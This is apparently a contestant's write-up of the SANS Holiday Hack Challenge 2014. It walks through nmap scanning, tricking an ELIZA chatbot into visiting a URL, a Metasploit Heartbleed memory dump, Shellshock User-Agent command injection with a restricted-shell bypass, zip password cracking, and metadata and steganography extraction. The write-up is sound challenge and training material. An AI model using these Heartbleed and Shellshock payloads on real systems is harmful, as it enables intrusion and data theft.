SANS Holiday Challenge 2014

http://pen-testing.sans.org/holiday-challenge/2014

This my Write UP for  Sans holiday challenge

My write up got Honorable Mention

http://pen-testing.sans.org/blog/pen-testing/2015/02/04/2014-sans-holiday-hack-winners-and-official-answers

 The Challenge script

The script of the challenge is divided in five stave we will try to analyze everyone to extract some evidences to help us to found all secrets of the Ghosts of Hacking Past, Present, and Future.

Questions:

What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website? You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine.

What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?

The Ghost of Hacking Past

The secret of the Ghost of Hacking Past is in 173.255.233.59; lets analyze this text from Stave 2: The First of the Three Spirits .

"My time grows short," observed the Spirit, as the scene dissolved back into Scrooge's bedroom. "Before I depart, I'd like to introduce you to an old friend of mine. She's at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret."

There is a secret running on 173.255.233.59  ; we must communicate and surf to internet with a service or application and try to extract the secret  .

Step 1: what’s open port or services are running in   173.255.233.59

nmap -sS -O -p1-65535 --script banner 173.255.233.59 -P0 …. 31124/tcp open     unknown |_banner: I AM ELIZA.  WHAT'S ON YOUR MIND?

Conclusion   : We see at port 31124 a service with banner:  I AM ELIZA.  WHAT'S ON YOUR MIND?

Step 2 : Try to discover service running on  31124

~# nc 173.255.233.59 31124 I AM ELIZA.  WHAT'S ON YOUR MIND? > hi HOW DO YOU DO. PLEASE STATE YOUR PROBLEM. > problem HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY? > web VERY INTERESTING > computer DO COMPUTERS WORRY YOU? > yes I UNDERSTAND > no ARE YOU SAYING 'NO' JUST TO BE NEGATIVE? >

Conclusion   : it’s like a robot that use in interpretation of our input to make an intelligence conversation.

Step 3: Try to search information about ELIZ on internet

http://en.wikipedia.org/wiki/ELIZA ELIZA is a computer program and an early example of primitive natural language processing. ELIZA operated by processing users' responses to scripts, the most famous of which was DOCTOR, a simulation of a Rogerian psychotherapist. Using almost no information about human thought or emotion, DOCTOR sometimes provided a startlingly human-like interaction. ELIZA was written at MIT by Joseph Weizenbaum between 1964 and 1966.

Conclusion   : ELIZA is software program and there are many implementation in different language ( lisp,BASIC, ….) .

We can try command injection to force this software to read file or execute operating systems command but we don’t have any idea about the language used by ELIZA running in 173.255.233.59 .

We can also try to play with ELIZA using social engineering and find words that can helps us to extract ELIAZ secret’s.

Step 4 : Communicate with ELIZA

We try to establish a communication with ELIZA and we send many words and the very important response is when we are using the word “secret”

> secret A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE? > secret YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES. > secret I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG.  I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU.  NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?

Conclusion   : ELIZA ask for URL that she can surf to, nice, what we can do is : prepare a web site that ELIZA can visit and see what she leave like traces  .

Step 5 : Make a web site that ELIZA can surf to 

Using a kali machine , start the apache web server . Make URL  using URL shortening like :  http://tinyurl.com/xxxxxx Monitor apache access.log to see how are visiting your web site : # tail -f /var/log/apache2/access.log

Step 6 : Try to invite ELIZA to visit our web site

The same way trying to use any words to invite ELIZA to visit our website:

URL 

Goto

visit

open

click

download

navigate

……….

ELIZA give us interesting’s response when we send the word “link” 

> link DO YOU THINK IT'S SAFE TO CLICK ON LINKS?. > link I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?

Remember the last ELIZA response “GIVE ME A URL THAT I CAN SURF TO” and we try to use the word “surf”

> surf http://tinyurl.com/xxxxxx DOES THIS LOOK LIKE THE CORRECT PAGE? HI ELIZA GIVES ME YOUR SECRET!!! >

“HI ELIZA GIVES ME YOUR SECRET!!!” is the title of my default webpage in http://tinyurl.com/xxxxxx .

Conclusion: the words you must use to communicate with ELIZA are : secret, link and surf

Step 7: Analyze ELIZA traces

tail -f /var/log/apache2/access.log 173.255.233.59 - - [29/Dec/2014:07:56:15 +0000] "GET /ip.php HTTP/1.1" 200 306 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: \"Machines take me by surprise with great frequency. -Alan Turing\""

Conclusion: the secret was located in the user-agent

User-Agent: Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"

The Ghost of Hacking Present

The Ghost of Hacking Present has two secrets on the http://www.scrooge-and-marley.com website.

Step 1 :  Analyze Stave 3: The Second of the Three Spirits

The Spirit shook his head, "It was you who suggested hacks could help 'Decrease the surplus population,' which could apply to dogs or men. Can't you see the implications of your philosophy, Scrooge? To help you understand, I've magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time." And then, in a snap, the Spirit vanished without a trace.

In the year 2014 there were two majors’ vulnerabilities:

Heartbleed  : http://en.wikipedia.org/wiki/Heartbleed

Shellshock : http://en.wikipedia.org/wiki/Shellshock_(software_bug)

Conclusion: The text “Those secrets should shock your heart”  , both indices directs us to exploit the two vulnerabilities  shockà Shellshock and heartà Heartbleed  

 

Step 2 : Exploit  Heartbleed   vulnerability   using Metasploit 

msf > use auxiliary/scanner/ssl/openssl_heartbleed  msf auxiliary(openssl_heartbleed) > set RHOSTS 23.239.15.124  msf auxiliary(openssl_heartbleed) > set ACTION DUMP  msf auxiliary(openssl_heartbleed) > exploit [+] 23.239.15.124:443 - Heartbeat response with leak [*] 23.239.15.124:443 - Heartbeat data stored in /root/.msf4/loot/20141220074816_default_23.239.15.124_openssl.heartble_128640.bin [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed #strings /root/.msf4/loot/20141220074816_default_23.239.15.124_openssl.heartble_128640.bin It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble.

Conclusion:  Website Secret #1=Hacking can be noble.

 

 

Step 3: Start brute force directories and files names

Using dirbsuter  from https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

  Conclusion: we see that there is a shell script under /cgi-bin/submit.sh

 Step 4: try to test if the script submit.sh is vulnerable to shellshock

Using restclient firefox pluging we try to inject in user-agent header: User-Agent= () { test;};echo \"Content-type: text/plain\"; echo; echo; pwd

Conclusion:  the website is vulnerable to shellshock

Step 5: Discover allowed command

We continue to send the injection in User-agent (command=ls,cat,more …) User-Agent= () { test;};echo \"Content-type: text/plain\"; echo; echo; command

Conclusion: we are in restricted shells, command that gives result are pwd , cd , echo

Step 5: bypassing restricted Shell

Bypassing ls command using echo * Send command = cd /var/www && echo * User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; cd /var/www && echo * Send command = cd / && echo * User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; cd / && echo *

 

Conclusion:  Bypassing restricted shell we see a file “secret” under /

Step 6 : reading file secret

Read file under restricted shell using:  while read line; do echo -e "$line"; done < /secret User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; while read line; do echo -e "$line"; done < /secret

 

Conclusion: Website Secret #2: Use your skills for good.

The Ghost of Hacking Future

The last four secrets are on the USB file system image.

Step 1 : Extract files from USB file system image

Under kali server we use testdisk tools and we extract 3 files : Using Undelete command we found one additional file :

Conclusion: using testdisk we have four files :

LetterFromJackToChuck.doc

hh2014-chat.pcapng:Bed_Curtains.zip

hh2014-chat.pcapng

Tiny_Tom_Crutches_Final.jpg

 

Step 2 : Analyze the  LetterFromJackToChuck.doc

root@kali:~/sans# file LetterFromJackToChuck.doc LetterFromJackToChuck.doc: Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Author: Jonathan Pease, Template: Normal.dotm, Last Saved By: Jonathan Pease, Revision Number: 1, Name of Creating Application: Microsoft Macintosh Word, Total Editing Time: 04:00, Create Time/Date: Mon Dec 25 14:27:00 2034, Last Saved Time/Date: Mon Dec 25 14:31:00 2034, Number of Pages: 1, Number of Words: 156, Number of Characters: 737, Security: 0 root@kali:~/sans# exiftool LetterFromJackToChuck.doc ExifTool Version Number         : 8.60 File Name                       : LetterFromJackToChuck.doc Directory                       : . File Size                       : 81 kB File Modification Date/Time     : 2034:12:26 03:10:10+00:00 File Permissions                : rw-r--r-- File Type                       : DOC MIME Type                       : application/msword Title                           : Subject                         : Author                          : Jonathan Pease Keywords                        : Comments                        : Template                        : Normal.dotm Last Modified By                : Jonathan Pease Revision Number                 : 1 Software                        : Microsoft Macintosh Word Total Edit Time                 : 4.0 minutes Create Date                     : 2034:12:25 14:27:00 Modify Date                     : 2034:12:25 14:31:00 Pages                           : 1 Words                           : 156 Characters                      : 737 Security                        : None Thumbnail Clip                  : (Binary data 4056 bytes, use -b option to extract) Category                        : Manager                         : None. I run the company! Company                         : Generic Victorian Company Lines                           : 35 Paragraphs                      : 12 Char Count With Spaces          : 881 App Version                     : 14.0000 Scale Crop                      : No Links Up To Date                : No Shared Doc                      : No Hyperlinks Changed              : No Title Of Parts                  : Heading Pairs                   : Title, 1 Code Page                       : Mac Roman (Western European) Hyperlink Base                  : Secret                          : USB Secret #1: Your demise is a source of mirth. Comp Obj User Type Len          : 32 Comp Obj User Type              : Microsoft Word 97-2004 Document root@kali:~/sans#

Conclusion: the first secret is located in the metadata of the file LetterFromJackToChuck.doc

USB Secret #1: Your demise is a source of mirth.

Step 3 : Analyze hh2014-chat.pcapng:Bed_Curtains.zip

root@kali:~/sans# file hh2014-chat.pcapng:Bed_Curtains.zip hh2014-chat.pcapng:Bed_Curtains.zip: Zip archive data, at least v2.0 to extract root@kali:~/sans# unzip hh2014-chat.pcapng:Bed_Curtains.zip Archive:  hh2014-chat.pcapng:Bed_Curtains.zip [hh2014-chat.pcapng:Bed_Curtains.zip] Bed_Curtains.png password: password incorrect--reenter: password incorrect--reenter:    skipping: Bed_Curtains.png        incorrect password root@kali:/usr/share/wordlists# fcrackzip -v -D -u -p rockyou.txt  hh2014-chat.pcapng:Bed_Curtains.zip Bed_Curtains.png found file 'Bed_Curtains.png', (size cp/uc 1429113/1434946, flags 9, chk 4d1a) checking pw budayday checking pw bb468971 checking pw udei9Qui   PASSWORD FOUND!!!!: pw == shambolic root@kali:~/sans# unzip hh2014-chat.pcapng:Bed_Curtains.zip Archive:  hh2014-chat.pcapng:Bed_Curtains.zip [hh2014-chat.pcapng:Bed_Curtains.zip] Bed_Curtains.png password: inflating: Bed_Curtains.png root@kali:~/sans# exiftool Bed_Curtains.png ExifTool Version Number         : 8.60 File Name                       : Bed_Curtains.png Directory                       : . File Size                       : 1401 kB File Modification Date/Time     : 2014:12:09 09:40:52+00:00 File Permissions                : rwxrwxrwx File Type                       : PNG MIME Type                       : image/png Image Width                     : 1369 Image Height                    : 1046 Bit Depth                       : 8 Color Type                      : RGB with Alpha Compression                     : Deflate/Inflate Filter                          : Adaptive Interlace                       : Noninterlaced SRGB Rendering                  : Perceptual XMP Toolkit                     : XMP Core 5.4.0 Photometric Interpretation      : RGB Orientation                     : Horizontal (normal) Comment                         : USB Secret #3: Your demise is a source of gain for others. Exif Byte Order                 : Big-endian (Motorola, MM) X Resolution                    : 72 Y Resolution                    : 72 Resolution Unit                 : inches Modify Date                     : 2034:12:25 13:30:00 Y Cb Cr Positioning             : Centered Image Size                      : 1369x1046

Conclusion: Brute force password for the zip file using a dictionary give us the password to extract a png file and the metadata of this file contain a comment with secret number 2

Step 3 : Analyze file hh2014-chat.pcapng

root@kali:~/sans# file hh2014-chat.pcapng hh2014-chat.pcapng: pcap-ng capture file - version 1.0 use http://pcapng.com/ to analyze metadata of file before analyzing data captured : root@kali:~# echo "VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==" | base64 -d USB Secret #2: Your demise is a source of relief. root@kali:~#wget  http://f5-steganography.googlecode.com/files/f5.jar java -jar f5.jar x -e out.txt Tiny_Tom_Crutches_Final.jpg root@kali:~/sans# more out.txt Tiny Tom has died. USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Conclusion:

 

USB Secret #1	Your demise is a source of mirth.
USB Secret #2	Your demise is a source of relief.
USB Secret #3	Your demise is a source of gain for others.
USB Secret #4	You can prevent much grief and cause much joy. Hack for good, not evil or greed.

 

Secrets of the Ghosts of Hacking Past, Present, and Future

Eliza Secret	Machines take me by surprise with great frequency. -Alan Turing
Website Secret #1	Hacking can be noble.
Website Secret #2	Use your skills for good.
USB Secret #1	Your demise is a source of mirth.
USB Secret #2	Your demise is a source of relief.
USB Secret #3	Your demise is a source of gain for others.
USB Secret #4	You can prevent much grief and cause much joy. Hack for good, not evil or greed.